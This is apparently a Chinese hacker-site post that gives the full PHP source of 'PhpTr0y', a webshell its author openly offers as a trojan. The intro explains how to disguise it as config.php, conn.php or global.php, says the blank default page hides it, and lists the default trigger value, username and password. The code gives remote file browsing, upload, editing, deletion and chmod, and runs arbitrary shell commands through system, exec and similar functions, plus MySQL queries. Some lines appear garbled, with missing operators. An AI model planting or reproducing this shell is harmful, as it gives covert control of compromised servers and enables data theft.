一个运行在服务端的php文件管理程序,也可以当木马用.借鉴了phpspy一些功能.
抛弃了传统的认证方式,改用先获取get值再登陆界面的方式.
如果你运行发现页面空白表示正常,这样隐蔽性会有很大提高.
默认get值为www.chinahacker.info.默认帐户skyfox.默认密码password9.
除了打包类没做以外其它的功能也差不多全了,自己没有时间做了,
其它事也很忙,可能有些bug,如果有的话告诉我,近期没什么时间改.
这个可能是第一个用xhtml输出的php中文木马了.呵呵.
为了尽量让文件小点,我去掉了注释.文件大小大约15K.
如果你需要把文件当作木马用的话,请注意修改文件名称比如.
config.php
conn.php
global.php
如有其它相关问题请联系我QQ53423398.
<?
/*----------------------------------------------------
Php T-r-0*y 1.0 by 天Fox.
ZiBo ShanDong China.
QQ:53423398.
Email:ooofox@msn.com
---------------------------------------------------*/
error_reporting(7);
$tr0yname="skyfox";
$tr0ypass="password9";
$checkmode['soc']="1";
if ( !ini_get('register_globals') )
{
extract($_POST);
extract($_GET);
extract($_SERVER);
extract($_FILES);
extract($_ENV);
extract($_COOKIE);
if ( isset($_SESSION) )
{
extract($_SESSION);
}
}
if ($checkmode['soc']=="1"){
session_start();
if ($_GET['get'] == "logout") {
session_destroy();
echo "<body onLoad=\"setTimeout('window.opener=null;window.close()', 3000)\">";
echo "<span style=\"font-size:12px;font-family: Tahoma\">退出成功窗口在3秒种后关闭<p></span>";
exit;
}
if ($_SESSION['admin']==$tr0yname && $_SESSION['pass']==$tr0ypass){
$_SESSION['admin']=$tr0yname && $_SESSION['pass']=$tr0ypass;}else{
if ($tr0yname==$_POST['name'] && $tr0ypass==$_POST['pass'])
{
$_SESSION['admin']=$tr0yname && $_SESSION['pass']=$tr0ypass;
}else{
login();
}
}
}
else
{
if ($_GET['get']=="logout"){
setcookie ("admin", "");
echo "<body onLoad=\"setTimeout('window.opener=null;window.close()', 3000)\">";
echo "<span style=\"font-size:12px;font-family: Tahoma\">退出成功窗口在3秒种后关闭<p></span>";
exit;
}
if (setcookie ("admin",$tr0ypass,time()+(1*24*3600))){
setcookie ("admin",$tr0ypass,time()+(1*24*3600));}else{
if ($tr0yname==$_POST['name'] && $tr0ypass==$_POST['pass'])
{
setcookie ("admin",$tr0ypass,time()+(1*24*3600));
}else{
login();
}
}
}
if(!empty($down)) {
if (!@file_exists($down)) {
echo "<script>alert('你要下的文件不存在!')</script>";
} else {
$filename = basename($down);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP Generated Data');
header('Content-Length: '.filesize($down));
@readfile($down);
exit;
}
}
$tr0ypath=str_replace('\\','/',dirname(__FILE__));
if (!isset($dirs) or empty($dirs)) {
$dirs = ".";
$nowpath = getPath($tr0ypath, $dirs);
} else {
$dirs=$_GET['dirs'];
$nowpath = getPath($tr0ypath, $dirs);
}
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="zh-CN"/>
<head>
<title>PhpTr0y bY 天Fox <? echo "当前系统: ".PHP_OS.""?></title>
<meta http-equiv=Content-Language content="text/html; charset=gb2312" />
<style type="text/css">
body{margin:0px;PADDING:0px;font-family:"Tahoma", Verdana, Lucida, Arial, Helvetica, 宋体,sans-serif;color:#FFF;font-size:12px;background:#677D92 left top;}
#title{margin:0px;padding:0px 0px 0px 0px;background:#8C0700;width:606px;LINE-HEIGHT:18px;}
#body{margin:0px;padding:0px 0px 0px 0px;width:600px;color:#FFF;background:#556B80;LINE-HEIGHT:150%;text-align:left;border:#768CA3 3px solid;}
#action{width:601px;color:#FFF;padding:0px 0px 0px 5px;background:#8C0700;text-align:left;}
a:link{font-weight:normal;text-decoration:none;color:#FFF;}
a:visited {font-weight:normal;text-decoration:none;color:#FFF;}
a:hover {font-weight:normal;text-decoration:none;color:#FFF;}
a:active {font-weight:normal;text-decoration:none;color:#FFF;}
form{margin:0}
select {background-color: #ffffff; color: #000000; font-size: 12px; border: 0px #cccccc double}
input,textarea {background-color: #ffffff; color: #000000; font-family: tahoma; font-size: 12px; border: 1px #cccccc double;}
option {font-size: 12px; background-color: #f3f3f3; color: #51485f;}
</style>
<script language=Javascript>
function CheckAll(form)
{
for (var i=0;i<form.elements.length;i++)
{
var e = form.elements[i];
if (e.name != 'selectall')
e.checked = form.selectall.checked;
}
}
</script>
</head>
<body>
<div align="center">
<div id="title"><a href="http://www.chinahacker.info/" target="new"><b>PhpTr0y1.0</b></a> <a href="<?=$_SERVER['PHP_SELF']?>"><b>返回根目录</b></a> <a href="?get=logout"><b>退出</b></a> <a href="?dir=phpinfo" target="new"><b>Phpinfo()</b></a> <a
href="?dir=shell"><b>Webshell</b></a> <a href="?dir=mysql"><b>Mysql</b></a></div><br />
<div id="body"><div align="left">当前目录位置:<?=$nowpath?>/<br />程序所在位置:<?=$tr0ypath?>/<br />
<form action="" method="get">跳转到指定目录:<input name="dirs" type="text" /><input type="submit" name="dirs" value="确定" /></form>
<form action="" method="post" enctype="multipart/form-data">上传文件到当前位置:<input name="uploadfiles" type="file" /><input
type="submit" name="uploadfile" value="确定"><input type="hidden" name="uploaddir" value="<?=$dirs?>" /></form>
<form action="" method="post">在当前目录建立文件夹:<input name="newdir" type="text" value=""><input type="submit" name="createdir" value="确定"></form>
<form action="" method="post">在当前目录新建文件:<input name="newfile" type="text" value=""><input type="submit" name="createfile" value="确定"></form></div></div><br /><?
if($entereditfile) {
$filename="$editfilename";
@$fp=fopen("$filename","w");
echo $msg=@fwrite($fp,$_POST['content']) ? "写入文件成功" : "写入失败";
@fclose($fp);
}
elseif ($createdir){
$newdirectory=$_POST['newdir'];
if (@mkdir($newdirectory, 0777)){
echo"<meta http-equiv=Content-Language content=\"text/html; charset=gb2312\" />";
echo "建立目录成功请点击这里返回.如果没有发现目录请刷新页面.";
}else{
echo"<meta http-equiv=Content-Language content=\"text/html; charset=gb2312\" />";
echo "建立目录没有成功,可能是现在的权限较低造成的或者你要创建的目录已经存在.请配置当前权限.";
}
}
elseif ($createfile) {
$newfile=$_POST['newfile'];
?>
<div id="body">程序名称&内容:<form action="?dir=<?=urlencode($dir)?>" method="post"><input maxLength="100" size="50" name="editfilename"
value="<?=$newfile?>" /><br /><textarea name="content" rows="23" cols="115"></textarea><br /><input type="submit" name="entereditfile"
value="确定新建" /></form></div>
<?
}
elseif($chmod){
$rechmod=base_convert($_POST['rechmod'],8,10);
echo $msg=chmod($dir."/".$file,$rechmod) ? "权限修改成功," : "权限修改失败,";
echo "修改后的属性为:".substr(base_convert(fileperms($dir."/".$file),10,8),-4)."";
}
elseif($rename){
echo $msg=rename($dirs."/".$renamefile,$dirs."/".$renamefile2) ? "修改文件名成功" : "修改文件名失败";
}
elseif(@$delfile!="") {
if(file_exists($delfile)) {
if (@unlink($delfile)) {
echo "".$delfile." 删除成功!";
} else {
echo "文件删除失败!";
}
} else {
echo "文件不存在,删除失败!";
}
}
elseif($deldir) {
if($deldir!="") {
if(!file_exists("$deldir")) {
echo "目录已不存在!";
} else {
if (@rmdir($deldir)){
echo "目录删除成功";
}else{
echo "删除失败!";
}
}
}
}
elseif($uploadfile) {
echo $msg=@copy($_FILES['uploadfiles']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfiles']['name']."") ? "上传成功" : "上传失败";
}
if($sql!=""){
$sql = trim(stripslashes($sql));
mysql_query($sql,$conn);
if(mysql_errno()==0)
{
$errInfo = "成功执行指定的SQL指令!";
}
else
{
$errInfo = mysql_error();
}
}
if (!isset($_GET['dir']) OR empty($_GET['dir']) OR ($_GET['dir'] == "dir")){
$handle=@opendir($dirs);
while ($file = @readdir($handle)) {
$test="$dirs/$file";
$retest=@is_dir($test);
if ($retest=="1"){
$filesize=@filesize($file);
if($file!=".." && $file!="."){
$ctime=@date("Y-m-d H:i:s",@filectime($test));
$mtime=@date("Y-m-d H:i:s",@filemtime($test));
$dirperm=@substr(@base_convert(@fileperms($test),10,8),-4);
echo "<div id=\"body\"><a href=\"?dirs=".urlencode($dirs)."/".urlencode($file)."\" title=\"创建时间: $ctime 最后修改时间: $mtime\">目录名称:<b>$file</b></a>
文件大小: $filesize KB 权限属性: $dirperm<br /><a href=\"?dir=".urlencode($dirs)."&deldir=".urlencode($dirs)."/".urlencode($file)."\" target=\"new\">删除</a> <a href=\"?get=newname&newname=$file\" target=\"new\">改名</a> 创建时间: $ctime 最后修改时间: $mtime</div>\n <br />";
}else{
if ($file==".."){
echo"<div id=\"action\"><a href=\"?dirs=".urlencode($dirs)."/".urlencode($file)."\">上级目录</a></div>";
}}}}
echo "<div id=\"title\">目录读取完毕,以下是文件.</div><br />";
@closedir($handle);
echo "<form action=\"\" method=\"post\">";
$handle=@opendir($dirs);
while ($file = @readdir($handle)) {
$test="$dirs/$file";
$retest=@is_dir($test);
if ($retest=="0"){
$filesize=@filesize($file);
$ctime=@date("Y-m-d H:i:s",@filectime($test));
$mtime=@date("Y-m-d H:i:s",@filemtime($test));
$dirperm=@substr(@base_convert(@fileperms($test),10,8),-4);
echo "<div id=\"body\"><a href=\"$test\" target=\"new\" title=\"创建时间: $ctime 最后修改时间: $mtime\">文件名
称:<b> $file</b></a> 文件大小: $filesize KB 权限属性: <a href=\"?get=cmhod&dir=".urlencode($dirs)."&file=".urlencode($file)."\" target=\"new\">$dirperm</a><br /><a href=\"?down=".urlencode($test)."\">下载</a> <a href=\"?edit=editfile&dir=".urlencode($dirs)."&editfile=".urlencode($file)."\" target=\"new\">编辑</a> <a href=\"?dir=".urlencode($dirs)."&delfile=".urlencode($dirs)."/".urlencode($file)."\" target=\"new\">删除</a> <a href=\"?dir=rename&dirs=".urlencode($dirs)."&renamefile=".urlencode($file)."\" target=\"new\">改名</a> 创建时间: $ctime 最后修改时间: $mtime</div>\n <br />";
}else{}
}
@closedir($handle);
}
elseif ($_GET['dir'] == "phpinfo") {
echo"<meta http-equiv=Content-Language content=\"text/html; charset=gb2312\" />";
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用.";
exit;
}
elseif ($_GET['dir']=="rename"){
echo "<form action=\"\" method=\"post\"><input name=\"renamefile2\" type=\"text\" value=$renamefile />";
echo "<input type=\"hidden\" name=\"dirs\" value=$dirs />";
echo "<input name=\"renamefile\" type=\"hidden\" value=$renamefile />";
echo "<input type=\"submit\" name=\"rename\" value=\"确定\" /></form>";
}
elseif ($_GET['dir']=="shell"){
?>
<div id="body">
<form action="" method="post">
<select name="execfunc" class="input">
<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
</select>
<input type="text" name="cmd" value="<?=$_POST['cmd']?>" />
<input type="submit" value="确定" /><br />
<textarea name="showbank" rows="23" cols="115" readonly="readonly"><?php
if (!empty($_POST['cmd'])) {
if ($execfunc=="system") {
system($_POST['cmd']);
} elseif ($execfunc=="passthru") {
passthru($_POST['cmd']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['cmd']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['cmd']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['cmd'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} else {
system($_POST['cmd']);
}
}
?></textarea>
</form>
</div>
<?
}
elseif ($_GET['dir']=="mysql") {
?>
<div id="body">
<form action="" method="post">
服务器地址:<input type="text" name="mysqlhost" value="localhost:3306" />
用户名:<input type="text" name="mysqluser" value="root" /><br />
数据库密码:<input type="text" name="mysqlpass" value="" />
数据库:<input type="text" name="mysqldb" value="" />
<input type="submit" name="mysql" value="确定" />
</form>
</div>
<?
if ($mysql) {
if($exec=mysql_connect($_POST['mysqlhost'],$_POST['mysqluser'],$_POST['mysqlpass']) and mysql_select_db($_POST['mysqldb'])) {
echo "数据库连接成功.";
echo "<div id=\"body\"><form action=\"\" method=\"post\">";
echo "<textarea name=\"sql\" rows=\"32\" cols=\"115\">$sql</textarea><br />";
echo "<input type=\"submit\" value=\"确定\" />你可以在此处执行MySQL命令.";
echo "</form></div>";
}else{
echo "数据库连接失败,请检查输入内容是否正确.";
}
}
}
elseif ($_GET['get']=="cmhod"){
?>
设置权限:<form action="" method="post"><input type="text" name="file" value="<?=$file?>" readonly="readonly" /><br /><input type="text" name="rechmod" value="<?=@substr(@base_convert(@fileperms($dir."/".$file),10,8),-4)?>" /><input name="dir" type="hidden" value="<?=$_GET['dir']?>" /><input type="submit" name="chmod" value="确定" /></form>
<?
}
elseif ($_GET['edit']=="editfile"){
if ($newfile==""){
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
?>
<div id="body">程序名称&内容:<form action="?dir=<?=urlencode($dir)?>" method="post"><input maxLength="100" size="50" name="editfilename"
value="<?=$filename?>" /><br /><textarea name="content" rows="23" cols="115"><?=$contents?></textarea><br /><input type="submit" name="entereditfile"
value="确定编辑" /></form></div>
<?
}
?>
<div id="action">程序制作:天Fox.免责声明:此程序仅用于技术交流,任何违法行为于程序作者无关.<br />Copyright © 2005 Chinahacker.info All Rights Reserved.</div>
</div>
</body>
</html>
<?
//函数库
function login() {
$get="www.chinahacker.info";
if ($_GET['get']==$get) {
?>
<style tpye="text/css">
select {background-color: #ffffff; color: #000000; font-size: 12px; border: 0px #cccccc double;}
input,textarea {background-color: #ffffff; color: #000000; font-family: tahoma; font-size: 12px; border: 1px #cccccc double;}
option {font-size: 12px; background-color: #f3f3f3; color: #51485f;}
</style>
<form method="post" action="<?=$_SERVER['PHP_SELF']?>"><input name="name" type="text" id="name" /><br /><input name="pass" type="password" id="pass"
/><br /><input type="submit" value="ok" /></form>
<?
}
else
{
echo"";
}
exit;
}
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
function getPath($mainpath, $relativepath) {
global $dirs;
$mainpath_info = explode('/', $mainpath);
$relativepath_info = explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++) {
if ($relativepath_info[$i] == '.' $relativepath_info[$i] == '') continue;
if ($relativepath_info[$i] == '..') {
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
} //end for
return implode('/', $mainpath_info);
}
?> |
|
|
|
|
您当前的位置:
